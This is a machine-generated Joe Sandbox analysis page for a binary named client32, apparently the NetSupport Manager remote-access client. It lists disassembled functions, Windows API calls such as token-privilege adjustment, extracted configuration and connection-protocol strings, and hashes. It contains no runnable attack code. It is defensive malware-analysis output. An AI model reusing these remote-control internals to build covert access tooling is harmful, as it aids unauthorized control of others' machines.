Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: c258226c146c350308cb7da9233c5495e7a755e7f5133af5fac3f6f334d4832e
Instruction ID: e1739435fd28c5009021fa5f322a8572e523871045f2c572860e4f699d643338
Opcode Fuzzy Hash: c258226c146c350308cb7da9233c5495e7a755e7f5133af5fac3f6f334d4832e
Instruction Fuzzy Hash: CB217C71F0022EAFEB00CAA5CC81FBFF7F8EB44744F408069E915DB280E675A91187A1

Function 1109C4F0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,1102FA03,00000000,00000000,00080000,33E68B52,00080000,00000000,00000000), ref: 1109C51D
OpenProcessToken.ADVAPI32(00000000), ref: 1109C524
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C535
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C559

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: ec0aeb84056820706021069ee4b0f545c2251a7e4d4ebea97ded86ddcfdbe07e
Instruction ID: a26769d0cf59d46d88c0300c81491fac92eb9b16b341a04a2d860a989291d25b
Opcode Fuzzy Hash: ec0aeb84056820706021069ee4b0f545c2251a7e4d4ebea97ded86ddcfdbe07e
Instruction Fuzzy Hash: 6F014CB1600219AFD710DF98CC89BAFF7BCEB48705F108529FA06D7280D7B06904CBA2

Function 1109C580 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109D8C0,00000244,cant create events), ref: 1109C59C
CloseHandle.KERNEL32(?,00000000,1109D8C0,00000244,cant create events), ref: 1109C5A5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction ID: b91f3ae979c30d2028e84bd2ed431ef9c175057a582b1d81b1e33605d5f1ac2c
Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction Fuzzy Hash: E6E0EC71610611ABE738CE25DD95FA677ECAF48B01F214A5DF956D6180CA60E8408B64

Function 1102DFF0 Relevance: 234.6, APIs: 31, Strings: 102, Instructions: 1865windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

GetSystemMetrics.USER32(00002000), ref: 1102E174
FindWindowA.USER32(NSMWClass,00000000), ref: 1102E335

Part of subcall function 1110D180: GetCurrentThreadId.KERNEL32 ref: 1110D216
Part of subcall function 1110D180: InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
Part of subcall function 1110D180: InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
Part of subcall function 1110D180: EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
Part of subcall function 1110D180: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272

GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E371
OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E399
IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102E65B

Part of subcall function 11093B90: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102E3C8,00000000,?,00000100,00000000,00000000,00000000), ref: 11093BAC
Part of subcall function 11093B90: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102E3C8,00000000,?,00000100,00000000,00000000,00000000), ref: 11093BB9
Part of subcall function 11093B90: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11093BE9

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102E3F8
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102E404
CloseHandle.KERNEL32(00000000), ref: 1102E41C
FindWindowA.USER32(NSMWClass,00000000), ref: 1102E429
GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E44B
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E1A6

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

LoadIconA.USER32(11000000,000004C1), ref: 1102E7F5
LoadIconA.USER32(11000000,000004C2), ref: 1102E805
DestroyCursor.USER32(00000000), ref: 1102E82E
DestroyCursor.USER32(00000000), ref: 1102E842

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102EE04
GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102EE57

Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(7693795C,?,00000104,7693795C), ref: 11141187

Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110C55B,76938400,?), ref: 1113F667
Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F687
Part of subcall function 1113F5D0: CloseHandle.KERNEL32(00000000), ref: 1113F68F

Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102F3F2
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102F42C
DispatchMessageA.USER32(?), ref: 1102F436
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102F448
CloseHandle.KERNEL32(00000000,Function_00026E80,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102F6E0
GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102F718
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102F71F
SetWindowPos.USER32(000203F4,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102F755
CloseHandle.KERNEL32(00000000,11059250,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102F7D6
wsprintfA.USER32 ref: 1102F945

Part of subcall function 111252F0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,33E68B52,00000002,76232EE0), ref: 1112534A
Part of subcall function 111252F0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11125357
Part of subcall function 111252F0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112539E

PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1102FA97
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102FAAD
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102FAD6
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102FAFF

Strings

Windows XP, xrefs: 1102EF88
DisableJoinClass, xrefs: 1102EB8E, 1102EC2C
ScreenScrape, xrefs: 1102EACF, 1102EAF9, 1102EB23
Intel error "%s", xrefs: 1102E6F8
V12.10.2, xrefs: 1102F333, 1102F367
AssertTimeout, xrefs: 1102E8D3
TCPIP, xrefs: 1102FA43
NSMWControl32, xrefs: 1102FA92
hClientRunning = %x, pid=%d (x%x), xrefs: 1102E45A
Windows 2000, xrefs: 1102EF5A
istaUI, xrefs: 1102E0A6
NoFTWhenLoggedOff, xrefs: 1102ECBC
NSSWControl32, xrefs: 1102FAC1
TracePriv, xrefs: 1102F3A9
DisableAudio, xrefs: 1102EA10, 1102EA31, 1102EA9F, 1102EC06, 1102ECA4
Windows NT, xrefs: 1102EF2D
*ScreenScrape, xrefs: 1102F471, 1102F4BA, 1102F6EC
client32, xrefs: 1102E595, 1102E732
_debug, xrefs: 1102F3AE
Windows Vista x64, xrefs: 1102F07C
TraceIPC, xrefs: 1102F99F
Info. Client already running, pid=%d (x%x), xrefs: 1102E37F
NSM.LIC, xrefs: 1102E4AD, 1102E54B
Windows 8, xrefs: 1102F167
OS2, xrefs: 1102EF0C
UseLegacyPrintCapture, xrefs: 1102EDE5
Windows 10 x64, xrefs: 1102F29C
Windows 98, xrefs: 1102EE9A
EnableSmartcardLogon, xrefs: 1102F83F
Error. Wrong hardware. Terminating, xrefs: 1102E699
DisableJournalMenu, xrefs: 1102EBEE, 1102EC8C
Windows 2008 x64, xrefs: 1102F0E1
EnableGradientCaptions, xrefs: 1102E880, 1102E897, 1102E8B8
V12.00.2, xrefs: 1102F32C
AlwaysOnTop, xrefs: 1102F72F
Windows 95, xrefs: 1102EE69
DisableTSAdmin, xrefs: 1102E9F8
IsILS returned %d, isvistaservice %d, xrefs: 1102E66A
DisableRunplugin, xrefs: 1102EAB7
DisableConsoleClient, xrefs: 1102E9E0, 1102EA75
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102E516
Error. Could not load transports - perhaps another client is running, xrefs: 1102F603
RestartAfterError, xrefs: 1102E9AA
NSA.LIC, xrefs: 1102E4BB, 1102E4C2, 1102E4E5
DisableReplayMenu, xrefs: 1102EBA6, 1102EC44
124406, xrefs: 1102F52D, 1102F586, 1102F5C7, 1102F6A4
UseNTSecurity, xrefs: 1102F85A
*StartupDelay, xrefs: 1102F3CB
Windows 7, xrefs: 1102F118
DisableRequestHelp, xrefs: 1102EBBE, 1102EC5C
DisableAudioFilter, xrefs: 1102EA49, 1102EE21
pcicl32, xrefs: 1102E304
Global\NSMWClassAdmin, xrefs: 1102F93A
NSMWClass, xrefs: 1102E136, 1102E317, 1102E424, 1102F92F
UseIPC, xrefs: 1102F96C
Windows 2003, xrefs: 1102EFAF
Windows 2003 x64, xrefs: 1102F017
CLIENT32.CPP, xrefs: 1102E1BA, 1102E74B
Windows XP Ding.wav, xrefs: 1102ED88
Windows CE, xrefs: 1102F2FE
Client, xrefs: 1102E479, 1102E988, 1102EA15, 1102EA36, 1102EAA4, 1102EABC, 1102EAD4, 1102EAFE, 1102EB28, 1102EB5E, 1102EB93, 1102EBAB, 1102EBC3, 1102EBDB, 1102EBF3, 1102EC0B, 1102EC31, 1102EC49, 1102EC61, 1102EC79, 1102EC91, 1102ECA9, 1102ECC1, 1102ECD9, 1102EDEA, 1102F3D0, 1102F476, 1102F4BF, 1102F69A, 1102F6F1, 1102F70D, 1102F734, 1102F844, 1102F85F, 1102F880, 1102F971
General, xrefs: 1102E8D8, 1102E9AF, 1102ED1E, 1102ED51
Windows 2008, xrefs: 1102F0B5
Windows 10, xrefs: 1102F26C
View, xrefs: 1102E485, 1102E885, 1102E89C, 1102E8BD
Windows 8.1 x64, xrefs: 1102F211
closed ok, xrefs: 1102E40E
Default, xrefs: 1102FA8B, 1102FABA, 1102FAE3
Windows 2016, xrefs: 1102F2D3
NSMWClassVista, xrefs: 1102E125
DisableHelp, xrefs: 1102ECD4
Windows XP x64, xrefs: 1102EFDE
Windows Ding.wav, xrefs: 1102ED81
win8ui, xrefs: 1102E798
Windows 8.1, xrefs: 1102F1EE
*PriorityClass, xrefs: 1102F708
Windows 7 x64, xrefs: 1102F139
EnableSmartcardAuth, xrefs: 1102F87B
NSTWControl32, xrefs: 1102FAEA
*ListenPort, xrefs: 1102FA3E
Audio, xrefs: 1102EA4E, 1102EE26
_debug, xrefs: 1102E79D, 1102E8F6, 1102F9A4
ShowKBEnable, xrefs: 1102EB59
Windows 2012 R2, xrefs: 1102F23D
istaService, xrefs: 1102E08B
Info. Trying to close client, xrefs: 1102E3E4
*BeepSound, xrefs: 1102ED4C
cl32main, xrefs: 1102E023
Ready, xrefs: 1102FB01
NeedsReinstall, xrefs: 1102E983
*BeepUsingSpeaker, xrefs: 1102ED19
LSPloaded=%d, WFPloaded=%d, xrefs: 1102E96A
Session shutting down, exiting..., xrefs: 1102E17E
Windows Vista, xrefs: 1102F04E
Bridge, xrefs: 1102E46D
Windows Millennium, xrefs: 1102EECA
Info. Client running as user=%s, type=%d, xrefs: 1102E3D2
MiniDumpType, xrefs: 1102E8F1
Windows 8 x64, xrefs: 1102F18F
Windows 2012, xrefs: 1102F1C0
gClient.hNotifyEvent, xrefs: 1102E1BF
DisableJournal, xrefs: 1102EBD6, 1102EC74

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Process$Create$CloseHandleWindow$EventPost$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFileFindIconInitializeLoadObjectPeekSingleTokenVersionWait$ClassDispatchEnterEnvironmentErrorExitExpandLastMetricsPrioritySendSleepStringsSystem__wcstoi64_malloc_memset
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$124406$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.2$V12.10.2$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
API String ID: 2246349635-337574495
Opcode ID: cf0df4e6c60ee646b84c5dfbe7496325484caf4152e234ca10a47272f43365c8
Instruction ID: 3da73235ebc76f34cbc1f653a3fbd5303c3029eb94abecf5a91a15bf3235dc2a
Opcode Fuzzy Hash: cf0df4e6c60ee646b84c5dfbe7496325484caf4152e234ca10a47272f43365c8
Instruction Fuzzy Hash: 3BE20774F4122AABE715CBE5CC84FADFBA5AB4470CF504469E924B73C4EB706940CB62

Function 1102D560 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE4A
$session$, xrefs: 1102DD16
WTSQuerySessionInformationA, xrefs: 1102D9FE
client32.ini, xrefs: 1102D7B5
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DE70
NSMWClass, xrefs: 1102D744
TCPIP, xrefs: 1102D965
11/09/15 09:21:05 V12.10F2, xrefs: 1102DE1E
ListenPort, xrefs: 1102D960
%sessionname%, xrefs: 1102DCE9, 1102DD02
screenscrape, xrefs: 1102D978
NSM.LIC, xrefs: 1102D582
, xrefs: 1102DB15
Error x%x reading %s, sesh=%d, xrefs: 1102D811
Client, xrefs: 1102D945, 1102D97D, 1102DA94
WTSFreeMemory, xrefs: 1102DAC1
ClientName, xrefs: 1102DB45
TSMode, xrefs: 1102D940
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102DCD4, 1102DD53
Wtsapi32.dll, xrefs: 1102D98C
%s.%02d, xrefs: 1102DCB0
IsA(), xrefs: 1102DCD9, 1102DD58
MacAddress, xrefs: 1102DA8F
Warning: Unexpanded clientname=<%s>, xrefs: 1102DC53
DisableConsoleClient, xrefs: 1102D8C7
%session%, xrefs: 1102DD2A
ts macaddr=%s, xrefs: 1102DA7C
client32 dbi %hs, xrefs: 1102DE23
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DA54
%02d, xrefs: 1102DC98
client32, xrefs: 1102D885
124406, xrefs: 1102DBA5, 1102DD6B, 1102DD8F, 1102DD9C, 1102DDCC, 1102DE41

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$11/09/15 09:21:05 V12.10F2$124406$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 3802068140-1426977848
Opcode ID: 4203bcd69c24f794be3a2175e52386947bd84c010198ad05e972880d151edcf0
Instruction ID: d240301f554d32d3b7904e5f3cd70c9da08142028b12ad4ce6a05654279abd09
Opcode Fuzzy Hash: 4203bcd69c24f794be3a2175e52386947bd84c010198ad05e972880d151edcf0
Instruction Fuzzy Hash: B132D675D0026A9FDB12DF94CC84BEDF7B9AB44308F8445E9E958A7280EB706E44CF61

Function 6C3D3D00 Relevance: 70.4, APIs: 11, Strings: 29, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 6C3D3D27

Strings

Port, xrefs: 6C3D3DCA
A2=%s, xrefs: 6C3D4109
CMD=OPEN, xrefs: 6C3D3EB9
HOSTNAME=%s, xrefs: 6C3D3F9A
CMPI=%u, xrefs: 6C3D3FEA
CHATID=%s, xrefs: 6C3D4046
client247, xrefs: 6C3D400F, 6C3D406B, 6C3D40D1, 6C3D412B, 6C3D4185
DEPT=%s, xrefs: 6C3D420C
GSK=%s, xrefs: 6C3D3FCC
connection_index == 0, xrefs: 6C3D3D7A
CLIENT_NAME=%s, xrefs: 6C3D3F17
APPTYPE=%d, xrefs: 6C3D41DD
ListenPort, xrefs: 6C3D3DDA
124406, xrefs: 6C3D3F0C
engineer, xrefs: 6C3D4297
TCPIP, xrefs: 6C3D3DCF, 6C3D3DDF
PROTOCOL_VER=%u.%u, xrefs: 6C3D3EEB
CLIENT_VERSION=1.0, xrefs: 6C3D3ED0
CLIENT_ADDR=%s, xrefs: 6C3D3F4A
A1=%s, xrefs: 6C3D40AF
1.1, xrefs: 6C3D3E02
PORT=%d, xrefs: 6C3D3F68
*Dept, xrefs: 6C3D41F4
MAXPACKET=%d, xrefs: 6C3D3F01
*Gsk, xrefs: 6C3D3E24
A3=%s, xrefs: 6C3D4163
CHATID, xrefs: 6C3D400A
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C3D3D75
A4=%s, xrefs: 6C3D41BD

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *Dept$*Gsk$1.1$124406$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$user
API String ID: 2102423945-373406310
Opcode ID: 3c1fb4cdc4771b3df368d6b159b15f7ded46271c37d2c2a86db7469a59571a4b
Instruction ID: 93b5865bd30d9757a2aa32e4ad3c1d913aae5a88ee0031a722d18776b8af0660
Opcode Fuzzy Hash: 3c1fb4cdc4771b3df368d6b159b15f7ded46271c37d2c2a86db7469a59571a4b
